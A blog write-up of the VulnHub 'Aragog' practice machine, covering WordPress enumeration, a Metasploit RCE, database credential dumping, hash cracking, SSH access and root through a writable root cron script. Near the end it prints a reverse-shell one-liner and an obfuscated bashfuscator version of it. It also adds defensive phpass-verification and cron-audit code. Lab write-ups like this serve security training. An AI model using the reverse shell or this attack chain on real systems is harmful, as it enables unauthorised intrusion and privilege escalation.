
vulnhub - Aragog - writeup

Posted: 2023-10-07 11:58:57  Views: 37
Tags: -- writeup 192.168 hagrid98 wordpress vulnhub wp root Aragog

Information gathering

The target has ports 80 and 22 open.

root@Lockly temp/tmp » arp-scan -I eth1 -l                                                     
Interface: eth1, type: EN10MB, MAC: 00:0c:29:fa:3d:23, IPv4: 192.168.56.106
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.100  08:00:27:4a:6c:d4       PCS Systemtechnik GmbH
192.168.56.107  08:00:27:c3:b4:ba       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.159 seconds (118.57 hosts/sec). 2 responded
root@Lockly temp/tmp » nmap -A -sT -p-  --min-rate 6000 192.168.56.107 -o /root/temp/tmp/aragog/nmap.nmap 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 00:32 CST
Nmap scan report for 192.168.56.107
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
|   256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_  256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:C3:B4:BA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.05 ms 192.168.56.107

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.62 seconds

The page on port 80 shows only a single image and nothing else.


Downloading the image and inspecting it turned up no hidden content.


Directory enumeration

gobuster finds a /blog path:

root@Lockly tmp/aragog » gobuster dir -u http://192.168.56.107 -w /usr/share/dirb/wordlists/common.txt       
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.107
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.hta                 (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/blog                 (Status: 301) [Size: 315] [--> http://192.168.56.107/blog/]
/index.html           (Status: 200) [Size: 97]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.107/javascript/]
/server-status        (Status: 403) [Size: 279]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Hostname resolution

It is a WordPress site, and it looks like a hostname has to be resolved first; I left wpscan running in the background in the meantime.


Following the page's links, clicking "log in" tries to reach wordpress.aragog.hogwarts and fails, so that is the hostname. After adding it to /etc/hosts and revisiting the site, the version shows as 5.0.12:


Brute-forcing the WP-Admin user with wpscan got nowhere; its vulnerability scan needs an API token, which you get by registering.


The scan results contain no directly exploitable RCE; a few are plugin RCEs, but the plugin is not installed here.


Searching msf for this WordPress version, I tried a fairly recent RCE module and got a shell.


Looking at the WP configuration file, it pulls in another default configuration file: /etc/wordpress/config-default.php


Dumping the MySQL database

cat-ing that file gives the database credentials: root : mySecr3tPass. After logging into MySQL, the wp_users table holds a single user, hagrid98, and a hashed password.

www-data@Aragog:/usr/share/wordpress$ cat /etc/wordpress/config-default.php
cat /etc/wordpress/config-default.php
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mySecr3tPass');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');
?>
www-data@Aragog:/usr/share/wordpress$ mysql -u root -p
mysql -u root -p
Enter password: mySecr3tPass

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 78538
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.009 sec)

MariaDB [(none)]> use wordpress;
use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
| wp_wpfm_backup        |
+-----------------------+
13 rows in set (0.001 sec)

MariaDB [wordpress]> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email               | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+--------------------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | hagrid98   | $P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc. | wp-admin      | [email protected] |          | 2021-03-31 14:21:02 |                     |           0 | WP-Admin     |
+----+------------+------------------------------------+---------------+--------------------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.001 sec)

MariaDB [wordpress]> 

Cracking the credentials

Cracking the hash with John gives the login credentials: hagrid98 : password123

root@Lockly tmp/aragog » john -w=/usr/share/wordlists/rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 512/512 AVX512BW 16x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123      (?)     
1g 0:00:00:00 DONE (2023-10-07 10:28) 1.785g/s 2742p/s 2742c/s 2742C/s 753951..mexico1
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed. 
root@Lockly tmp/aragog » 
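Why this hash fell so quickly: the "$P$B..." value in wp_users is WordPress's legacy phpass "portable" format, a plain chain of MD5 calls whose iteration count is encoded in the fourth character ('B' is itoa64 index 13, so 2^13 = 8192 rounds, matching John's "Cost 1" line). The implementation below is an added example, not code from the writeup or from WordPress; it reproduces the format so an auditor can read the cost off a wp_users row and confirm a recovered credential, and the only page-specific value it uses is hagrid98's hash from the dump above.

```python
import hashlib
import hmac

# phpass "portable" hash: "$P$" + 1 char log2(iterations) + 8 char salt + 22 char MD5 chain.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
WP_USERS_HASH = "$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc."  # hagrid98's row from the wp_users dump above


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base64 variant (not RFC 4648): 3 bytes -> 4 itoa64 chars, little-endian."""
    out, i = [], 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_cost(stored: str) -> int:
    """MD5 iterations encoded in the 4th character; WordPress's default 'B' means 2**13 = 8192."""
    if stored[:3] not in ("$P$", "$H$") or len(stored) != 34:
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(stored[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    return 1 << count_log2


def phpass_verify(password: str, stored: str) -> bool:
    """Recompute md5(salt+pw), then md5(prev+pw) `count` times, and compare in constant time."""
    count = phpass_cost(stored)
    pw = password.encode()
    digest = hashlib.md5(stored[4:12].encode() + pw).digest()
    for _ in range(count):
        digest = hashlib.md5(digest + pw).digest()
    return hmac.compare_digest(stored[:12] + _encode64(digest, 16), stored)
```

`phpass_cost(WP_USERS_HASH)` returns 8192: a few thousand MD5 calls per guess, cheap enough that a wordlist run like the one above finishes in under a second, which is the case for moving stored hashes to a memory-hard or bcrypt-class scheme.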

SSH login

After logging in there is a txt file right in the home directory, and its content is obviously base64. Decoding it yields a single sentence.

root@Lockly tmp/aragog » ssh hagrid98@192.168.56.107
The authenticity of host '192.168.56.107 (192.168.56.107)' can't be established.
ED25519 key fingerprint is SHA256:oAgAxZkRbtwe40/oXGuZbaPjiDWzluKXPpTv2r6TrAs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.107' (ED25519) to the list of known hosts.
hagrid98@192.168.56.107's password: 
Linux Aragog 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
hagrid98@Aragog:~$ pwd
/home/hagrid98
hagrid98@Aragog:~$ ls -al
total 28
drwxr-xr-x 3 hagrid98 hagrid98 4096 May  2  2021 .
drwxr-xr-x 4 root     root     4096 Apr  1  2021 ..
-rw-r--r-- 1 hagrid98 hagrid98  220 Apr  1  2021 .bash_logout
-rw-r--r-- 1 hagrid98 hagrid98 3526 Apr  1  2021 .bashrc
drwx------ 3 hagrid98 hagrid98 4096 Apr  1  2021 .gnupg
-rw-r--r-- 1 hagrid98 hagrid98   91 Apr  1  2021 horcrux1.txt
-rw-r--r-- 1 hagrid98 hagrid98  807 Apr  1  2021 .profile
hagrid98@Aragog:~$ cat horcrux1.txt 
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}
hagrid98@Aragog:~$ 


root@Lockly tmp/aragog » echo "MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==" | base64 -d                                                                                           1 ↵
1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets#

Privilege escalation

Uploading linpeas turned up nothing; uploading pspy to watch scheduled tasks revealed a backup script that runs as root.


The current user also has write permission on that file, so a one-line reverse shell can be written straight into it; the command is obfuscated before writing.

root@Lockly bashfuscator/bin » ./bashfuscator -c "/bin/bash -i >& /dev/tcp/192.168.56.106/9999 0>&1"
[+] Mutators used: Command/Reverse -> Command/Case Swapper
[+] Payload:

  ${@} b"${@~~}"a""$'\163'\h ${*^^}   <<<   "$(      xYndeH='   ${@~}  "E"$'"'"'\166'"'"'""\A${*/36n&E$l}L "$(    ${@~}  ${*^}  ${*//fVf0G}REV <<<   '"'"'1&>0 9999/601.65.861.291/PCT/VED/ &> I- HSAB/NIB/'"'"' ${*^^}  ;   ${*/U<f<}  ${*/s:R./T@g3}    )"  ${*/o\,KdV5/m_,%h;} '   ${!@}  ; "${@^}"   ''p\r"i"n\t"""f"   %s "${xYndeH~~}" ${*/csZ$0_|k/UUfxuI?&}  ; ${*%%_ATm}   ${@~}  )" ${*~~}  ${*}  

[+] Payload size: 396 characters

Write it into /.baskup.sh, wait a moment and root comes back; the loot is in the usual place, /root.
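The root cause here is a root cron job executing a script that a low-privilege user can modify. The audit function below is an added example, not part of the original writeup: it walks a system-format crontab, pulls the absolute paths out of each command and flags any regular file that is group- or world-writable. It assumes GNU coreutils (stat -c) and /etc/crontab field layout; the sample crontab and scripts are constructed for illustration.

```shell
#!/bin/sh
# Audit: find scripts launched from a system crontab that non-owners can modify.
# Assumes GNU coreutils (stat -c). Input file uses /etc/crontab layout:
#   m h dom mon dow user command...   or   @reboot user command...
check_cron_scripts() {
    crontab_file=$1
    # Drop comments, blank lines and VAR=value assignments before parsing entries.
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_][A-Za-z0-9_]*=)' "$crontab_file" |
    while read -r line; do
        # Word-split the entry into positional parameters (intended).
        set -- $line
        case $1 in
            @*) user=$2; shift 2 ;;   # @reboot/@daily style: one schedule field
            *)  user=$6; shift 6 ;;   # five time fields, then the user
        esac
        for tok in "$@"; do
            # Only absolute paths that resolve to regular files are candidates.
            case $tok in /*) ;; *) continue ;; esac
            [ -f "$tok" ] || continue
            mode=$(stat -L -c '%a' "$tok")
            owner=$(stat -L -c '%U' "$tok")
            # Group- or world-writable (octal 022 bits): anyone in that group, or
            # anyone at all, can replace what cron will run as "$user".
            if [ $((0$mode & 022)) -ne 0 ]; then
                printf 'WRITABLE %s runs-as=%s owner=%s mode=%s\n' "$tok" "$user" "$owner" "$mode"
            fi
        done
    done
}

# Stand-alone use on a real host: ./cron_audit.sh /etc/crontab /etc/cron.d/*
for f in "$@"; do
    check_cron_scripts "$f"
done
```

A clean result is an empty output; any WRITABLE line names a file whose owner and mode should be tightened to root:root 0755 (or 0700) before the next scheduled run.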


From: https://www.cnblogs.com/bktown/p/17745920.html
